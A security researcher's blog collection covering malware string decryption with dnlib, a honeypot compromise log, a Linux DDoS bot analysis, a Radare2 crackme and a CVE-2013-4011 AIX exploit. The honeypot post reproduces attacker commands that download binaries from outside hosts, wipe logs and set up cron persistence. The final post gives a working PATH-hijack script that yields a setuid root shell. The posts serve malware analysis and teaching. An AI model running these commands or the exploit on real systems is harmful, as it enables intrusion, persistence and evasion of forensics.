Agent Tesla Strings Decrypter

I wanted to take a look at dnlib to understand what it can do. At the same time I had to deal with an ‘Agent Tesla’ sample, which used string obfuscation with AES-256 in CBC mode.

The decryption method was easy to find, as can be seen in the capture below:

A quick win is to copy and paste this method into a new Visual Studio project; it will do the decryption work later on.

First we have to load the assembly binary.

using dnlib.DotNet;
using dnlib.DotNet.Emit;

// dnlib parses the metadata of the sample; nothing in it is executed
ModuleDefMD module = ModuleDefMD.Load(executable);

Next we iterate over the types and all the methods of the binary, looking for a ldstr opcode (value 114 in IL); if the string is immediately followed by a call, that means the string is a parameter of that method.

foreach (TypeDef type in module.GetTypes())
{
    countModule++;

    foreach (MethodDef method in type.Methods)
    {
        // skip methods without a body (abstract, extern) and constructors
        if (!method.HasBody || method.IsConstructor)
            continue;

        countMethod++;

        // stop one short of the end so that Instructions[i + 1] always exists
        for (int i = 0; i < method.Body.Instructions.Count - 1; i++)
        {
            // 114 (0x72) is the IL value of OpCodes.Ldstr
            if (method.Body.Instructions[i].OpCode.Value == 114)
            {
                // ldstr directly followed by a call: the string is that call's argument
                if (method.Body.Instructions[i + 1].OpCode == OpCodes.Call)
                {

Now we can retrieve the encrypted string and pass it to the DecryptString method. Afterwards, to get a clean output sample, we replace the string and remove the call to the real decryption method inside the loaded assembly.

                    // the encrypted string is the operand of the ldstr
                    var cryptedstring = method.Body.Instructions[i].Operand.ToString();

                    string decryptedstring = DecryptString(cryptedstring);

                    // keep the original max stack value so dnlib does not throw while recomputing it on write
                    method.Body.KeepOldMaxStack = true;

                    // replace the encrypted literal with the plaintext...
                    method.Body.Instructions[i].OpCode = OpCodes.Ldstr;
                    method.Body.Instructions[i].Operand = decryptedstring;

                    // ...and drop the call to the in-assembly decryption routine
                    method.Body.Instructions.Remove(method.Body.Instructions[i + 1]);
                }
            }
        }
    }
}

And finally we save our new clean assembly:

String outputfilename = outputFolderName + "\\" + filename + "_uncrypt.exe";

module.Write(outputfilename);

Opening the cleaned assembly in dnSpy, we can see the clean strings:

Of course, if the algorithm changes, we have to fix the source code and rebuild the binary, which can be a bit painful. An evolution could be to use some kind of reflection to call the decryption method inside the loaded assembly (via its RVA, for example). We will explore this another time.

As you can see, it's really easy to use the basics of dnlib, and we can do even cooler things!

The source code of the decrypter can be found on my GitHub, in case it is useful to anyone.

If you see any bugs or have further ideas to make it great again, don't hesitate to message me.

Extract malware defender quarantine files

I haven’t posted here for a long time… And I’m restarting with a quick trick.

A few days ago, I was looking for a way to extract a malware sample from Malware Defender quarantine files. A friend told me it is encrypted with RC4 and gave me the key. I made a script to automate that: MalwareDefenderDecrypter

The output is quite dirty: there are some bytes (probably headers) to remove before the MZ.

I have also added a Kaspersky script decoder.

Android VM remote debugging with IDA

If you want to remotely debug an Android binary in a VM, you can use IDA easily, but if, like me, you also run IDA in a virtual machine, you need a trick.

IDA ships its own binaries for remote debugging, so you don’t need gdbserver:
[screenshot: ida-bin]

So first copy the android_server binary to the sdcard of your VM, or use

adb push android_server /data/local/tmp

Start a shell on your Android VM and start android_server (don’t forget to add the execute permission with chmod 755)

[screenshot: and-shell]

Forward the debug port (23946) so you can use it from your local machine. Right now the android_server port is only bound to the lo interface, so it is not reachable from another interface, and you can’t use iptables to forward it. But redir can!

[screenshot: redir]

Check it with a useful mnemonic command:
[screenshot: lapute]
It’s cool 😉

Now configure IDA: select the Remote ARM Linux/Android debugger and go to Debugger->Process options:

[screenshot: conf-ida]

Don’t forget to fill in only the remote paths; if IDA can’t find the binary on the Android VM, it will upload it.

That’s all 🙂

Honeypot test

I recently heard of a new system logger, sysdig.
It seems to be very complete; it uses strace, tcpdump and lsof to take traces.

I want to try it on a honeypot.

So, install a virtual machine with my favourite OS, Debian 7.5 🙂

Installing sysdig is very easy, just type one command:

[screenshot: sysdig_install]

Set a basic password for root like “toor”, and start logging with this command:

nohup sysdig -s 4096 -z -w /var/log/.syslog/$(hostname).scap.gz &

I use /var/log/.syslog to hide the directory 🙂

And wait for the attack! 😀

After 4 hours, my VM was pwned.

[screenshot: netstat]

[screenshot: ps]

[screenshot: topnet]

[screenshot: topconnect]

Take a look at the commands used by the bad guy:

17:11:55 root)/usr/lib/openssh/sftp-server
17:12:48 root)chmod 7777 / etc
17:12:48 root)killall -9 .IptabLes
17:12:48 root)killall -9 nfsd4
17:12:48 root)killall -9 profild.key
17:12:48 root)cd /etc
17:12:48 root)rm -rf dir fake.cfg
17:12:48 root)killall -9 nfsd
17:12:48 root)killall -9 DDosl
17:12:48 root)killall -9 lengchao32
17:12:48 root)killall -9 b26
17:12:48 root)killall -9 Bill
17:12:48 root)killall -9 n26
17:12:48 root)killall -9 1
17:12:48 root)killall -9 codelove
17:12:48 root)killall -9 32
17:12:48 root)killall -9 m32
17:12:48 root)killall -9 m64
17:12:48 root)killall -9 64
17:12:48 root)killall -9 83BOT
17:12:48 root)killall -9 node24
17:12:48 root)killall -9 mimi
17:12:48 root)killall -9 nodeJR-1
17:12:48 root)killall -9 freeBSD
17:12:48 root)killall -9 ksapdd
17:12:48 root)killall -9 kysapdd
17:12:48 root)killall -9 sksapdd
17:12:48 root)killall -9 xsw
17:12:48 root)killall -9 syslogd
17:12:48 root)killall -9 skysapdd
17:12:48 root)killall -9 cupsddd
17:12:48 root)killall -9 ksapd
17:12:48 root)killall -9 atddd
17:12:48 root)killall -9 xfsdxd
17:12:48 root)killall -9 sfewfesfs
17:12:48 root)cd /root
17:12:48 root)chmod 7777 / etc
17:12:48 root)killall -9 minerd
17:12:48 root)killall -9 0
17:12:48 root)killall -9 joudckfr
17:12:48 root)killall -9 www
17:12:48 root)killall -9 log
17:12:48 root)killall -9 .IptabLex
17:12:48 root)killall -9 .Mm2
17:12:48 root)killall -9 acpid
17:12:48 root)killall -9 m64
17:12:48 root)killall -9 ./QQ
17:12:48 root)killall -9 QQ
17:12:48 root)killall -9 g3
17:12:48 root)killall -9 2
17:12:48 root)killall -9 3
17:12:48 root)killall -9 pm
17:12:48 root)killall -9 qweasd
17:12:48 root)killall -9 tangtang
17:12:48 root)killall -9 imap-login
17:12:48 root)killall -9 xudp
17:12:48 root)killall -9 txma
17:12:48 root)killall -9 mrdos64.b00
17:12:48 root)killall -9 mrdos32.b00
17:12:49 root)rm -rf dir kysapdd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sksapdd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir skysapdd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir xfsdxd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir fake.cfg
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir cupsdd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir atdd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir ksapd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir kysapd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sksapd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir skysapd.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir xfsdx.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sfewfesfs
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir gfhjrtfyhuf
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir rewgtf3er4t
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sdmfdsfhjfe
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir gfhddsfew
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir ferwfrre
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir dsfrefr
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sfewfesfs.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir gfhjrtfyhuf.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir rewgtf3er4t.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir sdmfdsfhjfe.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir gfhddsfew.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir ferwfrre.*
17:12:49 root)cd /etc
17:12:49 root)rm -rf dir dsfrefr.*
17:12:49 root)cd /tmp
17:12:49 root)rm -rf dir 1.*
17:12:49 root)cd /tmp
17:12:49 root)rm -rf dir 2.*
17:12:49 root)cd /tmp
17:12:49 root)rm -rf dir 3.*
17:12:49 root)cd /tmp
17:12:49 root)rm -rf dir 4.*
17:12:49 root)cd /tmp
17:12:49 root)rm -rf dir 5.*
17:12:49 root)cd /var/spool/cron
17:12:49 root)rm -rf dir root.*
17:12:49 root)cd /var/spool/cron
17:12:49 root)rm -rf dir root
17:12:49 root)cd /var/spool/cron/crontabs
17:12:49 root)rm -rf dir root.*
17:12:49 root)cd /var/spool/cron/crontabs
17:12:49 root)rm -rf dir root
17:12:49 root)cd /var/spool/cron
17:12:49 root)wget http://122.224.34.75:8188/root
17:12:52 root)cd /var/spool/cron/crontabs
17:12:52 root)wget http://122.224.34.75:8188/root
17:12:54 root)cd /etc
17:12:54 root)wget http://122.224.34.75:8188/sfewfesfs
17:13:02 root)cd /etc
17:13:02 root)wget http://122.224.34.75:8188/gfhjrtfyhuf
17:13:12 root)cd /etc
17:13:12 root)wget http://122.224.34.75:8188/rewgtf3er4t
17:13:16 root)cd /etc
17:13:16 root)wget http://122.224.34.75:8188/sdmfdsfhjfe
17:13:22 root)cd /etc
17:13:22 root)wget http://122.224.34.75:8188/gfhddsfew
17:13:30 root)cd /etc
17:13:30 root)wget http://122.224.34.75:8188/ferwfrre
17:13:35 root)cd /etc
17:13:35 root)wget http://122.224.34.75:8188/dsfrefr
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 sfewfesfs
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 gfhjrtfyhuf
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 rewgtf3er4t
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 sdmfdsfhjfe
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 gfhddsfew
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 ferwfrre
17:13:41 root)cd /etc
17:13:41 root)chmod 7777 dsfrefr
17:13:41 root)cd /etc
17:13:41 root)chattr +i sfewfesfs
17:13:41 root)nohup /etc/ferwfrre
17:13:41 root)nohup /etc/ferwfrre
17:13:41 root)nohup /etc/gfhddsfew
17:13:41 root)nohup /etc/gfhddsfew
17:13:41 root)nohup /etc/sdmfdsfhjfe
17:13:41 root)nohup /etc/sdmfdsfhjfe
17:13:41 root)nohup /etc/rewgtf3er4t
17:13:41 root)nohup /etc/rewgtf3er4t
17:13:41 root)nohup /etc/dsfrefr
17:13:41 root)nohup /etc/dsfrefr
17:13:41 root)rm -rf /root/.bash_history
17:13:41 root)nohup /etc/gfhjrtfyhuf
17:13:41 root)nohup /etc/gfhjrtfyhuf
17:13:41 root)touch /root/.bash_history
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /var/log
17:13:41 root)cd /root
17:13:41 root)sleep 600
17:13:43 root)basename /usr/sbin/service
17:13:43 root)basename /usr/sbin/service
17:13:43 root)cd /
17:13:43 root)basename /usr/sbin/service
17:13:43 root)basename /usr/sbin/service
17:13:43 root)cd /
17:13:43 root)run-parts --lsbsysinit --list /lib/lsb/init-functions.d
17:13:43 root)grep -q permission
17:13:43 root)/sbin/ebtables -t filter -L
17:13:43 root)/sbin/ebtables -t filter -L
17:13:43 root)/sbin/ebtables -t nat -L
17:13:43 root)/sbin/ebtables -t broute -L
17:13:43 root)/bin/echo -n Clearing ebtables rulesets:
17:13:43 root)/bin/echo -n filter
17:13:43 root)/sbin/ebtables -t filter --init-table
17:13:43 root)/bin/echo -n nat
17:13:43 root)/sbin/ebtables -t nat --init-table
17:13:43 root)/bin/echo -n broute
17:13:43 root)/sbin/ebtables -t broute --init-table
17:13:43 root)cut -d -f1
17:13:43 root)grep -E ^(ebt|ebtable)_ /proc/modules
17:13:43 root)rmmod ebtable_broute
17:13:43 root)rmmod ebtable_filter
17:13:43 root)rmmod ebtable_nat
17:13:43 root)rmmod ebtables
17:13:43 root)/bin/echo -n done
17:13:43 root)run-parts --lsbsysinit --list /lib/lsb/init-functions.d
17:13:43 root)grep -q permission
17:13:43 root)/sbin/ebtables -t filter -L
17:13:43 root)/sbin/ebtables -t filter -L
17:13:43 root)/sbin/ebtables -t nat -L
17:13:43 root)/sbin/ebtables -t broute -L
17:13:43 root)/bin/echo -n Clearing ebtables rulesets:
17:13:43 root)/bin/echo -n filter
17:13:43 root)/sbin/ebtables -t filter --init-table
17:13:43 root)/bin/echo -n nat
17:13:43 root)/sbin/ebtables -t nat --init-table
17:13:43 root)/bin/echo -n broute
17:13:43 root)/sbin/ebtables -t broute --init-table
17:13:43 root)cut -d -f1
17:13:43 root)grep -E ^(ebt|ebtable)_ /proc/modules
17:13:43 root)rmmod ebtable_broute
17:13:43 root)rmmod ebtable_nat
17:13:43 root)rmmod ebtable_filter
17:13:43 root)rmmod ebtables
17:13:43 root)/bin/echo -n done
17:13:55 root)basename /usr/sbin/service
17:13:55 root)basename /usr/sbin/service
17:13:55 root)cd /
17:13:55 root)setsid /etc/.SSH2
17:13:55 root)setsid /etc/.SSH2
17:13:55 root)setsid /etc/.SSH2
17:13:55 root)setsid /etc/.SSH2
17:17:01 root)cd /
17:17:01 root)run-parts --report /etc/cron.hourly
17:21:29 root)ps -ef
17:21:34 root)ps -ef
17:22:14 root)ps -ef

He downloaded 8 binaries.
17:12:49 root)wget http://122.224.34.75:8188/root
17:12:54 root)wget http://122.224.34.75:8188/sfewfesfs
17:13:02 root)wget http://122.224.34.75:8188/gfhjrtfyhuf
17:13:12 root)wget http://122.224.34.75:8188/rewgtf3er4t
17:13:16 root)wget http://122.224.34.75:8188/sdmfdsfhjfe
17:13:22 root)wget http://122.224.34.75:8188/gfhddsfew
17:13:30 root)wget http://122.224.34.75:8188/ferwfrre
17:13:35 root)wget http://122.224.34.75:8188/dsfrefr

And we can find another one in /etc/.SSH2


Two binaries are packed with UPX; their sums once unpacked:

MD5: 1da702a39ad4bc15c5a1e51422f4cd69 sha1: 529f5beda846688f43c748e3b78fd947aa6bf662 rewgtf3er4t
MD5: f9ad37bc11a4f5249b660cacadd14ad3 sha1: e41a40fdcd94718eef8a954ce67bd03ac5c70a00 sfewfesfs

rewgtf3er4t is the same binary as SSH2; probably when rewgtf3er4t is launched it copies itself to /etc/.SSH2

VirusTotal analysis (one report per sample): dsfrefr, ferwfrre, gfhddsfew, gfhjrtfyhuf, rewgtf3er4t, sdmfdsfhjfe, sfewfesfs, SSH2

And the root file is intended to be used as a crontab.

#more root | grep -v ^#
*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 profild.key
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 sdmfdsfhjfe
*/98 * * * * killall -9 gfhjrtfyhuf
*/97 * * * * killall -9 sdmfdsfhjfe
*/96 * * * * killall -9 rewgtf3er4t
*/95 * * * * killall -9 ferwfrre
*/94 * * * * killall -9 dsfrefr
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhjrtfyhuf
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sfewfesfs
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sdmfdsfhjfe
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhddsfew
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/rewgtf3er4t
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ferwfrre
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/dsfrefr
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir gfhjrtfyhuf
*/360 * * * * cd /etc;rm -rf dir dsfrefr
*/360 * * * * cd /etc;rm -rf dir sdmfdsfhjfe
*/360 * * * * cd /etc;rm -rf dir rewgtf3er4t
*/360 * * * * cd /etc;rm -rf dir gfhddsfew
*/360 * * * * cd /etc;rm -rf dir ferwfrre
*/1 * * * * cd /etc;rm -rf dir sfewfesfs.*
*/1 * * * * cd /etc;rm -rf dir gfhjrtfyhuf.*
*/1 * * * * cd /etc;rm -rf dir dsfrefr.*
*/1 * * * * cd /etc;rm -rf dir sdmfdsfhjfe.*
*/1 * * * * cd /etc;rm -rf dir rewgtf3er4t.*
*/1 * * * * cd /etc;rm -rf dir gfhddsfew.*
*/1 * * * * cd /etc;rm -rf dir ferwfrre.*
*/1 * * * * chmod 7777 /etc/gfhjrtfyhuf
*/1 * * * * chmod 7777 /etc/sfewfesfs
*/1 * * * * chmod 7777 /etc/dsfrefr
*/1 * * * * chmod 7777 /etc/sdmfdsfhjfe
*/1 * * * * chmod 7777 /etc/rewgtf3er4t
*/1 * * * * chmod 7777 /etc/gfhddsfew
*/1 * * * * chmod 7777 /etc/ferwfrre
*/99 * * * * nohup /etc/sfewfesfs > /dev/null 2>&1&
*/100 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/99 * * * * nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
*/98 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/97 * * * * nohup /etc/rewgtf3er4t > /dev/null 2>&1&
*/96 * * * * nohup /etc/ferwfrre > /dev/null 2>&1&
*/95 * * * * nohup /etc/dsfrefr > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c
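
As an added triage helper (not part of the original post), the script below parses both the sysdig command capture above and the crontab entries just shown, and pulls out the indicators a responder wants first: download URLs, killed process names, chmod 7777 and chattr +i targets, truncated logs, history wiping and cron directories touched. The rule set is my own and the sample lines are copied from this capture.

```python
import re
from collections import defaultdict

# Added triage helper, not code from the original post. It understands the two line
# shapes shown on the page: sysdig "HH:MM:SS user)command" entries and crontab entries.
SYSDIG_RE = re.compile(r"^(\d{2}:\d{2}:\d{2}) (\w+)\)(.*)$")
CRON_RE = re.compile(r"^(\S+ \S+ \S+ \S+ \S+) (.*)$")

# indicator name -> regex over the command text; group 1 is the value to record
RULES = {
    "download":     re.compile(r"\bwget\s+(\S+)"),
    "kill_process": re.compile(r"\bkillall -9 (\S+)"),
    "world_setuid": re.compile(r"\bchmod 7777 (\S+)"),
    "immutable":    re.compile(r"\bchattr \+i (\S+)"),
    "log_truncate": re.compile(r"cd /var/log > (\S+)"),
    "history_wipe": re.compile(r"(rm -rf /root/\.bash_history|history -c)"),
    "cron_persist": re.compile(r"cd (/var/spool/cron\S*)"),
}


def parse_line(line):
    """Return (source, command) for a sysdig or crontab line, or None for anything else."""
    m = SYSDIG_RE.match(line)
    if m:
        return "sysdig", m.group(3).strip()
    m = CRON_RE.match(line)
    if m and m.group(1).startswith("*/"):
        return "cron", m.group(2).strip()
    return None


def triage(lines):
    """Collect the distinct values matched by each rule, in first-seen order."""
    found = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        _, cmd = parsed
        for name, rx in RULES.items():
            m = rx.search(cmd)
            if m and m.group(1) not in found[name]:
                found[name].append(m.group(1))
    return dict(found)


def download_hosts(report):
    """Distinct host:port values the dropper fetched from (IP literal or domain)."""
    hosts = {url.split("//", 1)[1].split("/", 1)[0] for url in report.get("download", [])}
    return sorted(hosts)


# Constructed sample: a handful of lines copied from the capture and the crontab above
SAMPLE = """\
17:12:48 root)killall -9 nfsd4
17:12:49 root)cd /var/spool/cron
17:12:49 root)wget http://122.224.34.75:8188/root
17:13:41 root)chmod 7777 sfewfesfs
17:13:41 root)chattr +i sfewfesfs
17:13:41 root)rm -rf /root/.bash_history
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/dsfrefr
*/1 * * * * cd /var/log > auth.log
*/1 * * * * history -c
""".splitlines()

if __name__ == "__main__":
    report = triage(SAMPLE)
    for name, values in report.items():
        print(f"{name:13} {values}")
    print("download hosts:", download_hosts(report))
```

Feeding it the whole capture instead of SAMPLE gives the list of dropped file names and of the /var/log files the crontab truncates, which is the starting point for the host cleanup.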

All the binaries are known to be DDoS tools and the Elknot trojan; if later I have a little more time, I’ll try to reverse them.

Reference: draios.com

Simple crackme with Radare2

Jvoisin and Maijin, members of my hackerspace (Hackgyver), always talk to me about Radare, a new open source reverse engineering framework they are working on.

So I want to try it on a very simple Linux crackme.

Classic and easy install: clone it from git, configure, make and make install.

The condemned binary is called “Easy_ELF”

Start by seeing what it is:

[screenshot: rabin2]

Sections:

[screenshot: sections]

I want to see its strings.

[screenshot: strings]

We have the good boy and bad boy messages and their offsets 🙂

Try to launch the crackme:

[screenshot: launch]

OK, we can start the static analysis; disassemble the first 15 lines

[screenshot: start]

We arrive at the start function and can see that the main function starts at 0x804851b.

Show the first 30 lines of the main function

[screenshot: begin]

We assume the password check function is at 0x8048451

[screenshot: check1]

The first cmp compares the second letter of the password with 0x31, and the fifth with 0x58.

All the other characters are just xored.

[screenshot: xor]

We have 0x4C 0x31 0x4E 0x55 0x58

[screenshot: rax]

[screenshot: result]

\o/

Radare supports many architectures (arm, x86, x86-64, gameboy, mips, sparc, …) and many file types (dex, bios, elf, PE, COFF). The Radare team does great work!

So, I have tried 1% of what Radare can do; the other 99% is here:

Official web site

Documentation

rasm

other crackme

Hiding your processes from other users

Since kernel 3.2 a new mount option for the /proc filesystem has been introduced, “hidepid”, which lets a user see only their own processes.

To enable it, just edit the relevant line in /etc/fstab.


proc /proc proc defaults,hidepid=2 0 0

Possible options:

0 Default: everyone sees everyone’s processes

1 The user does not see other users’ processes via ps, top, etc., but can still list them in /proc.

2 The user does not see other users’ processes via ps, top, etc., and cannot list them in /proc either.

Analysis of a Linux Malware

A few days ago, I received a weird connection on my kippo honeypot.
A guy connected, downloaded a binary file and tried to launch it, but not successfully.

[screenshot: Small_Kippo_capture]

[screenshot: command_capture]

So after some checks, I was able to download this binary :), so let’s analyse it!

$ file disknyp
disknyp: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped

$ du -sk disknyp
1460 disknyp

It’s statically linked, which explains its big size, and it’s not stripped 🙂

Hash:
MD5: 260533ebd353c3075c9dddf7784e86f9
SHA1: 9a40f162e5bcaac2d58c0363ef2baf7b4c1a9710

Look at the main function in IDA.

[screenshot: main]

Coded in C++, it runs as a daemon; after that, it launches _ZN9CStatBase10InitializeEv, which gets some system info.

[screenshot: Initialize]

_ZN9CStatBase13GetSysVersionEv runs a uname command.
_ZN9CStatBase9GetCpuSpdEv reads /proc/cpuinfo and extracts the CPU frequency.
__ZN9CStatBase13InitGetCPUUseEv opens /proc/stat and checks the CPU usage.
_ZN9CStatBase13InitGetNetUseEv opens /proc/net/dev and gets network information.

After that it initialises the server:

[screenshot: Initialize_server]

Look at the decrypt function:

[screenshot: Decrypt]

The decrypt function is called twice: once with the argument 281-206-3//18 (the C&C IP address?), whose decrypted value is 190.115.20.27, and then with 68961, which gives the port number 59870.

It isn’t necessary to write a script to reverse this function, since we can see the decrypted values in memory, but the function is easy to understand: it does an ASCII addition on the encrypted value, then an ASCII subtraction, in a loop.
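
As an added example (my own reconstruction, not the malware’s code), the two pairs quoted above are both explained by a routine that subtracts 1 from every even-indexed byte and adds 1 to every odd-indexed one; that alternating rule is an assumption derived from those two pairs only, so the block first shows how to derive the per-byte deltas from a known pair before applying the rule.

```python
# Added example, not code from the malware or the original post. The alternating
# -1/+1 rule below is an assumption derived only from the two pairs given in the analysis
# (281-206-3//18 -> 190.115.20.27 and 68961 -> 59870).

def derive_deltas(encoded, plain):
    """Per-position byte differences between an encrypted value and its plaintext.

    This is the first thing to compute when a decrypted value is visible in memory:
    a repeating pattern in the result usually gives away the routine directly."""
    if len(encoded) != len(plain):
        raise ValueError("encrypted and plaintext values differ in length")
    return [ord(p) - ord(e) for e, p in zip(encoded, plain)]


def decode_alternating(encoded):
    """Reconstructed decoder: byte i gets -1 when i is even, +1 when i is odd."""
    return "".join(chr(ord(ch) + (1 if i % 2 else -1)) for i, ch in enumerate(encoded))


def encode_alternating(plain):
    """Inverse transform, used only to confirm the decoder round-trips."""
    return "".join(chr(ord(ch) - (1 if i % 2 else -1)) for i, ch in enumerate(plain))


def extract_c2(encoded_host, encoded_port):
    """Decode the two arguments the sample passes to its decrypt function."""
    host = decode_alternating(encoded_host)
    port = int(decode_alternating(encoded_port))
    if not 0 < port < 65536:
        raise ValueError("decoded port out of range: %d" % port)
    return host, port


if __name__ == "__main__":
    # values taken from the analysis above
    print(derive_deltas("281-206-3//18", "190.115.20.27"))
    print(extract_c2("281-206-3//18", "68961"))
```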

# netstat -laputen
Connexions Internet actives (serveurs et établies)
Proto Recv-Q Send-Q Adresse locale Adresse distante Etat User Inode PID/Program name
tcp 4 0 192.168.1.69:46730 190.115.20.27:59870 ESTABLISHED 1000 138545 18345/disknyp

Location of the C&C:

[screenshot: geoloca]

Belize is not the right place to make malware, but rather to jump into the sea and drink mojitos 🙂

Next, it calls the _ZN8CManager15StartNetProcessEv function, which creates a thread, initialises a socket and sends information.

[screenshot: start_server2]

And it creates a fake.cfg file containing the IP address of my host, which for me is the local address.

$ cat fake.cfg
0
127.0.1.1:127.0.1.1
10000:60000

Then it reads the /proc/stat and /proc/net/dev files and just sends the kernel version to the C&C in a loop.

[screenshot: tcp_flow]

Exploit CVE-2013-4011

In July 2013 a new vulnerability was found on AIX: it lets local users gain privileges in a very simple way.

The flaw is due to a programming error in the ibstat command

(futex@aixbox) $ which ibstat
/usr/bin/ibstat
(futex@aixbox) $ ls -l /usr/bin/ibstat
lrwxrwxrwx    1 root     bin              16 01 oct 02:18 /usr/bin/ibstat -> /usr/sbin/ibstat
(futex@aixbox) $ ls -l /usr/sbin/ibstat
-r-sr-xr-x    1 root     bin           47388 12 nov 2012  /usr/sbin/ibstat

After some hunting, the real binary is /usr/sbin/ibstat, and it has the setuid bit!

With a simple strings command, we can see which commands the binary uses

(futex@aixbox) $ strings /usr/sbin/ibstat | grep ifconfig
ifconfig %s
(futex@aixbox) $ strings /usr/sbin/ibstat | grep arp
arp -t ib -a
(futex@aixbox) $ strings /usr/sbin/ibstat | grep lsattr
lsattr -El %s

As we can see, none of the commands are called with their full path! So we can exploit it easily.

We place ourselves in the tmp directory

(futex@aixbox) $ cd /tmp

And we create a script with the name of one of the commands used by the ibstat binary; its only goal is to copy the shell binary to /tmp and set the setuid bit

(futex@aixbox) $ vi arp

#!/bin/sh

cp /bin/sh /tmp/root
chown root /tmp/root
chmod 4755 /tmp/root

Don’t forget to set the executable bit on the script

(futex@aixbox) $ chmod 755 ./arp

Then we change the PATH environment variable:

(futex@aixbox) $ PATH=.:${PATH}
(futex@aixbox) $ which arp
./arp

And launch the ibstat command

(futex@aixbox) $ ibstat -a -i en0

ERROR: “/dev/en0”: open failed rc=2, errno=2
Check device state of “icm” and “en0”.

===============================================================================
IB INTERFACE ARP TABLE
===============================================================================

The /tmp/arp script is launched by the ibstat command; this command is owned by root and has the setuid bit, so it executes with root privileges and launches our script with root privileges too 🙂


(futex@aixbox) $ ls -l /tmp/root
-rwsr-xr-x    1 root     sys          292606 14 oct 10:48 /tmp/root
(futex@aixbox) $ id
uid=1001(futex) gid=3(sys)
(futex@aixbox) $ ./root
(futex@aixbox) $ id
uid=1001(futex) gid=3(sys) euid=0(root)

The ibstat command is in the devices.common.IBM.ib.rte fileset

The following fileset levels are vulnerable:


AIX Fileset Lower Level Upper Level
-------------------------------------------------------
devices.common.IBM.ib.rte 6.1.6.0 6.1.6.21
devices.common.IBM.ib.rte 6.1.7.0 6.1.7.18
